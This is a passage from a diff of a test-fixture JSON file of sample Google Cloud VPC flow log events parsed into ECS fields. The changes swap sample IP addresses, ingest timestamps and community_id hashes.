+ "67.43.156.13" ] }, "gcp": { 
@@ -19460,8 +19460,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869134500Z", - "original": "{\"insertId\":\"19im82tfdygzno\",\"jsonPayload\":{\"bytes_sent\":\"188997\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"251\",\"reporter\":\"SRC\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392257300Z", + "original": 
"{\"insertId\":\"19im82tfdygzno\",\"jsonPayload\":{\"bytes_sent\":\"188997\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"251\",\"reporter\":\"SRC\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072555233Z", "end": "2019-06-14T03:49:59.565108524Z", @@ -19482,10 +19482,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33568, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -19499,7 +19499,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:0bB9/qzQDttOyEP0YcGU/tYSYIQ=", + "community_id": "1:cHbiBB9WtpuQHZE4rFxmPUo/X2c=", "bytes": 16783, "name": "default", "transport": "tcp", @@ -19522,7 +19522,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -19558,8 +19558,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869137800Z", - "original": "{\"insertId\":\"19im82tfdygzo0\",\"jsonPayload\":{\"bytes_sent\":\"16783\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"79\",\"reporter\":\"SRC\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392262900Z", + "original": 
"{\"insertId\":\"19im82tfdygzo0\",\"jsonPayload\":{\"bytes_sent\":\"16783\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789035952Z\",\"packets_sent\":\"79\",\"reporter\":\"SRC\",\"rtt_msec\":\"506\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.456732113Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.456732113Z", "end": "2019-06-14T03:49:51.789035952Z", @@ -19580,10 +19580,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -19597,7 +19597,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:QGl7xqW3Uf/sdc65sGHXAGERKzs=", + "community_id": "1:vA48e3jlLz+8NYBf08b8IMoSjVU=", "bytes": 18120, "name": "default", "transport": "tcp", @@ -19620,7 +19620,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -19656,8 +19656,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869141600Z", - "original": "{\"insertId\":\"19im82tfdygznd\",\"jsonPayload\":{\"bytes_sent\":\"18120\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392266800Z", + "original": 
"{\"insertId\":\"19im82tfdygznd\",\"jsonPayload\":{\"bytes_sent\":\"18120\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"120\",\"reporter\":\"SRC\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458361534Z", "end": "2019-06-14T03:49:51.789258875Z", @@ -19678,10 +19678,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -19695,7 +19695,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:A0Ohg3bqUresKEeBgZsLcFqEPRw=", + "community_id": "1:yyzV++A5KAdmyX88TOnGIQ8RV60=", "bytes": 64071, "name": "default", "transport": "tcp", @@ -19718,7 +19718,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -19754,8 +19754,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869148300Z", - "original": "{\"insertId\":\"19im82tfdygzn8\",\"jsonPayload\":{\"bytes_sent\":\"64071\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"368\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392271300Z", + "original": 
"{\"insertId\":\"19im82tfdygzn8\",\"jsonPayload\":{\"bytes_sent\":\"64071\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33558},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565319136Z\",\"packets_sent\":\"368\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140109489Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140109489Z", "end": "2019-06-14T03:49:59.565319136Z", @@ -19776,10 +19776,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.88", + "address": "67.43.156.14", "port": 53106, "domain": "zeek-nsm", - "ip": "198.51.100.88" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -19793,7 +19793,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:7XAVLIIXucPcO5qM8uynmx+KF7s=", + "community_id": "1:/j39rLoEcamlJFwzEQGPMQYhVds=", "bytes": 175465, "name": "default", "transport": "tcp", @@ -19816,7 +19816,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.88" + "67.43.156.14" ] }, "gcp": { 
@@ -19852,8 +19852,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869151500Z", - "original": "{\"insertId\":\"19im82tfdygznw\",\"jsonPayload\":{\"bytes_sent\":\"175465\",\"connection\":{\"dest_ip\":\"198.51.100.88\",\"dest_port\":53106,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"337\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392276900Z", + "original": 
"{\"insertId\":\"19im82tfdygznw\",\"jsonPayload\":{\"bytes_sent\":\"175465\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":53106,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.401543207Z\",\"packets_sent\":\"337\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.020290305Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.020290305Z", "end": "2019-06-14T03:49:56.401543207Z", @@ -19876,9 +19876,9 @@ "as": { "number": 16509 }, - "address": "203.0.113.228", + "address": "67.43.156.13", "port": 9243, - "ip": "203.0.113.228" + "ip": "67.43.156.13" }, "source": { "address": "10.49.136.133", @@ -19892,7 +19892,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:arV4D7RJIpRwsrWa/m7Q9mUVaPI=", + "community_id": "1:iY4jL+9QMjdSzot4PM7XduwgWhY=", "bytes": 1987804, "transport": "tcp", "type": "ipv4", @@ -19907,7 +19907,7 @@ "related": { "ip": [ "10.49.136.133", - "203.0.113.228" + "67.43.156.13" ] }, "gcp": { 
@@ -19931,8 +19931,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869155200Z", - "original": "{\"insertId\":\"19im82tfdygzo2\",\"jsonPayload\":{\"bytes_sent\":\"1987804\",\"connection\":{\"dest_ip\":\"203.0.113.228\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":52780},\"dest_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"26428\",\"reporter\":\"SRC\",\"rtt_msec\":\"91\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392280900Z", + "original": 
"{\"insertId\":\"19im82tfdygzo2\",\"jsonPayload\":{\"bytes_sent\":\"1987804\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":9243,\"protocol\":6,\"src_ip\":\"10.49.136.133\",\"src_port\":52780},\"dest_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"26428\",\"reporter\":\"SRC\",\"rtt_msec\":\"91\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.183499423Z", "end": "2019-06-14T03:49:58.592579489Z", @@ -19959,18 +19959,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 206824, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 242 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:uLseEqRu8Dul5leogDK11gQV06U=", + "community_id": "1:NkGfacExXrlt+hMyCxxaT2CdDeM=", "bytes": 206824, "name": "default", "transport": "tcp", @@ -19992,7 +19992,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -20029,8 +20029,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869158Z", - "original": "{\"insertId\":\"19im82tfdygzn9\",\"jsonPayload\":{\"bytes_sent\":\"206824\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392285Z", + "original": 
"{\"insertId\":\"19im82tfdygzn9\",\"jsonPayload\":{\"bytes_sent\":\"206824\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33532,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565272745Z\",\"packets_sent\":\"242\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072372604Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072372604Z", "end": "2019-06-14T03:49:59.565272745Z", @@ -20057,18 +20057,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 14287, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 80 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:QGl7xqW3Uf/sdc65sGHXAGERKzs=", + "community_id": "1:vA48e3jlLz+8NYBf08b8IMoSjVU=", "bytes": 14287, "name": "default", "transport": "tcp", @@ -20090,7 +20090,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -20127,8 +20127,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869161Z", - "original": "{\"insertId\":\"19im82tfdygznh\",\"jsonPayload\":{\"bytes_sent\":\"14287\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392288400Z", + "original": 
"{\"insertId\":\"19im82tfdygznh\",\"jsonPayload\":{\"bytes_sent\":\"14287\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33858,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789258875Z\",\"packets_sent\":\"80\",\"reporter\":\"DEST\",\"rtt_msec\":\"4\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458361534Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458361534Z", "end": 